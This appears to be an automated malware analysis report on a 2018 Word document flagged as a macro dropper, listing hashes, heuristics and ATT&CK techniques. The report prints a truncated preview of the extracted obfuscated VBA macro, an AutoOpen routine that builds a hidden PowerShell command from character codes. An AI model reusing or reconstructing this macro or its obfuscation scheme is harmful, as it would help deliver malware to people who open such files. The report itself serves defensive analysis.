Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 badb817e770ffe54…

MALICIOUS

Office (OLE)

Size: 228.0 KB
Created: 2018-06-28 06:38:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: e603e3d4dd328946a512bf9465bc1c9e
SHA-1: f967a5fc5765fca9402bbd5bd63260afbca028d0
SHA-256: badb817e770ffe541135c737c4f564016aac786a7fae6860c21620b6ab39d33d
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function, a critical indicator of execution, and is flagged as an auto-executing macro (AutoOpen). This means the macro is designed to run as soon as the document is opened, most likely to download and execute a secondary payload. The ClamAV detection name further supports its classification as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6593935-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6593935-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11755 bytes
SHA-256: 951e9e5fd222b2d7dfc26f46fe87f34b1caab5ec98488a425309b408e5ed32ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sdzLunq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iaIGkiYfwwkP"
Function JCzRcqtY()
On Error Resume Next
QUToD = ChrB(39057 + _
Sin(hEMRV * CLng(hVpEh + 61166) _
 + 55673 _
+ ChuspS))
RKOzr _
= 13895 + Atn(48279) / 86898 / _
Round(94811) / 62616 / CInt(wwaOp)
rYcWm = "hell     " + "      " + "      " + "        " + "         " + "        " + "& " + Chr(40) + Chr(40) + "vaR" + "Iable" + " '*M" + "dr*'" + Chr(41) + "." + "nAme[3," + "11,2"
jLwoO _
= 67583 + Atn(17702) / 16196 / _
Round(72240) / 44775 / CInt(qwPmu)
YhwvH = ChrB(84923 + _
Sin(iMkOmZ * CLng(OBABtO + 56221) _
 + 12769 _
+ YNDhUp))
lZhUcZHIIwl = "]-joIn''" + Chr(41) + " " + Chr(40) + " -jOi" + "N" + Chr(40) + " " + Chr(40) + "35 ," + " 111 ,87," + "112 , " + "58, " + "105, 98," + "112,42 ," + "104,101" + ", 10" + "9, 9"
PPnnUH _
= 38414 + Atn(40969) / 48567 / _
Round(37599) / 12890 / CInt(BwuVM)
zovOtj = ChrB(57516 + _
Sin(BaiDK * CLng(tjUwz + 73615) _
 + 54529 _
+ hfbZH))
DrGqBR = "8 , 1" + "00, 115 " + ", 39 " + ", 73, 9" + "8 ,115" + " ,41 " + ", 80" + " ,98 ," + " 101 ," + "68, 107, " + "110 , 98" + ",105"
Ehdrr _
= 12703 + Atn(39746) / 1408 / _
Round(69858) / 2247 / CInt(HJCFt)
VIiMVi = ChrB(92504 + _
Sin(ZwsHQ * CLng(UYGMUw + 82770) _
 + 23280 _
+ DswTd))
JBPvPOuS = " , 115,60" + ",35 " + ", 73 " + ",112 , 10" + "8,58" + " ,32 " + ",111, 1" + "15, 11" + "5 , 1" + "19,61,4" + "0 , 40,"
dZBnsG _
= 32120 + Atn(47418) / 20061 / _
Round(69048) / 5889 / CInt(VRIbtU)
BiCql = ChrB(93806 + _
Sin(JEfUYK * CLng(iwYrT + 45115) _
 + 61259 _
+ AwcRP))
rkUipDikPb = " 112, 1" + "12, " + "112, 41" + ",101 ,1" + "02 ,115 ," + "111, 104 " + ",97 , " + "97 , 41" + " ,117 " + ", 114 " + ", 40 ,"
uvbzc _
= 9055 + Atn(53660) / 18587 / _
Round(51022) / 68736 / CInt(rzwLt)
LsOrUj = ChrB(69774 + _
Sin(wjziGN * CLng(haPIE + 40956) _
 + 93580 _
+ qUWob))
fVlQwv = " 95, 9" + "7 , " + "109 , " + "62,79 , 4" + "0 , 71 , " + "111, 115" + " ,115"
airGGR _
= 48032 + Atn(1589) / 58395 / _
Round(49213) / 24216 / CInt(ZfVibU)
wJXhD = ChrB(78968 + _
Sin(OmXWw * CLng(IzWAGb + 275) _
 + 92028 _
+ jvpwNw))
zXTMdsuOfw = ", 119" + ",61,40 ," + " 40,112 ," + "112 ,112," + "41, 116 ," + "115, " + "102,96, 1" + "10 ,1" + "05 , " + "96,41 ," + "106, 1" + "10 ,100, "
kMtCS _
= 60405 + Atn(35679) / 6259 / _
Round(2194) / 77472 / CInt(lDmdH)
SibJVX = ChrB(99667 + _
Sin(aBdbs * CLng(cYzCK + 57542) _
 + 93283 _
+ dfSwSJ))
SWbAziF = "111,102 " + ", 98 ,10" + "7 , 119" + " ,98" + " , 102 " + ",100 , " + "111 , 98 "
sIDoO _
= 57681 + Atn(58766) / 40373 / _
Round(14765) / 28225 / CInt(thsdpb)
hpMFj = ChrB(35277 + _
Sin(iqFwqW * CLng(qFhtZ + 75315) _
 + 57547 _
+ zDpnVk))
iFPtddWtulG = ",126 , " + "41,10" + "0 , 10" + "4 ,1" + "06 ,4" + "1,102" + ",114, 40" + ",93, 1" + "00 ,81 " + ",100"
JCzRcqtY = rYcWm + lZhUcZHIIwl + DrGqBR + JBPvPOuS + rkUipDikPb + fVlQwv + zXTMdsuOfw + SWbAziF + iFPtddWtulG
jzprq _
= 70932 + Atn(37960) / 3776 / _
Round(74669) / 47403 / CInt(KjnZYR)
jDcKkP = ChrB(78172 + _
Sin(EsJQvw * CLng(PGFGzj + 39908) _
 + 43269 _
+ uUocu))
End Function
Function wLdZqqAvN()
On Error Resume Next
YiYvmh _
= 72922 + Atn(48518) / 28617 / _
Round(50622) / 4859 / CInt(jbsWc)
STjTSS = ChrB(22656 + _
Sin(jZPPa * CLng(kOUir + 372) _
 + 20601 _
+ ihrfw))
OowzN = ",40,71" + " ,111" + ", 115," + "115,119 " + ",61 ," + "40 ," + "40,111 ,1"
nvKYr _
= 886 + Atn(19814) / 50133 / _
Round(16429) / 9551 / CInt(GjXBM)
wzqaS = ChrB(13774 + _
Sin(icdGp * CLng(cmVqal + 28075) _
 + 82907 _
+ aCKGP))
YkHOw = "04 ,114 " + ", 117,10" + "7 ,1" + "10 , 1" + "02 , 119" + ", 119, 4"
lQnJR _
= 45572 + Atn(84813) / 62281 / _
Round(12460) / 89449 / CInt(owtPW)
kJcZk = ChrB(86860 + _
Sin(PwSaZo * CLng(MrvtM + 80983) _
 + 94292 _
+ bkGOw))
CONNhZ = "1 ,100 ," + " 104, 10" + "6, 4" +
... (truncated)